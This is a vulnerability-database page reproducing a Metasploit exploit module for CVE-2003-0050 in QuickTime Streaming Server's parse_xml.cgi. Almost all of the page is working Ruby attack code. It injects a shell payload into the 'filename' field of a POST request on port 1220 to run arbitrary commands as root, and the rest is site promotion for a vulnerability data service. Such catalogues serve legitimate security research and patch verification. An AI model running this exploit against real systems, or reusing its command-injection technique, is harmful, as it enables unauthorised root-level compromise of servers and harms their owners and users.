Lucene search
K

QuickTime Streaming Server parse_xml.cgi Remote Execution

šŸ—“ļøĀ 31 Dec 2009Ā 00:00:00Reported byĀ H D MooreTypeĀ 
packetstorm
Ā packetstorm
šŸ”—Ā packetstormsecurity.comšŸ‘Ā 41Ā Views

QuickTime Streaming Server parse_xml.cgi Remote Execution. Vulnerable to metacharacter injection, allowing arbitrary commands to be executed as root

Related
Code
`##  
# $Id: qtss_parse_xml_exec.rb 7776 2009-12-09 15:13:35Z hdm $  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'QuickTime Streaming Server parse_xml.cgi Remote Execution',  
'Description' => %q{  
The QuickTime Streaming Server contains a CGI script that is vulnerable  
to metacharacter injection, allow arbitrary commands to be executed as root.  
},  
'Author' => [ 'hdm' ],  
'License' => MSF_LICENSE,  
'Version' => '$Revision: 7776 $',  
'References' =>  
[  
[ 'OSVDB', '10562'],  
[ 'BID', '6954' ],  
[ 'CVE', '2003-0050' ]  
],  
'Privileged' => true,  
'Payload' =>  
{  
'DisableNops' => true,  
'Space' => 512,  
'Compat' =>  
{  
'PayloadType' => 'cmd',  
'RequiredCmd' => 'generic perl bash telnet',  
}  
},  
'Platform' => 'unix',  
'Arch' => ARCH_CMD,  
'Targets' => [[ 'Automatic', { }]],  
'DefaultTarget' => 0  
))  
  
register_options([  
Opt::RPORT(1220)  
], self.class)  
end  
  
def exploit  
  
print_status("Sending post request with embedded command...")  
  
data = "filename=" + Rex::Text.uri_encode(";#{payload.encoded}|")  
  
response = send_request_raw({  
'uri' => "/parse_xml.cgi",  
'method' => 'POST',  
'data' => data,  
'headers' =>  
{  
'Content-Type' => 'application/x-www-form-urlencoded',  
'Content-Length' => data.length,  
}  
}, 3)  
  
# If the upload worked, the server tries to redirect us to some info  
# about the file we just saved  
if response and response.code != 200  
print_error("Server returned non-200 status code (#{response.code})")  
end  
  
handler  
end  
end  
  
`

Data

Build on a solid foundation withĀ Vulners data

WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data

Api

Power your application withĀ Vulners API

The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access

App

Assess and manage vulnerabilities withĀ VulnersĀ tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation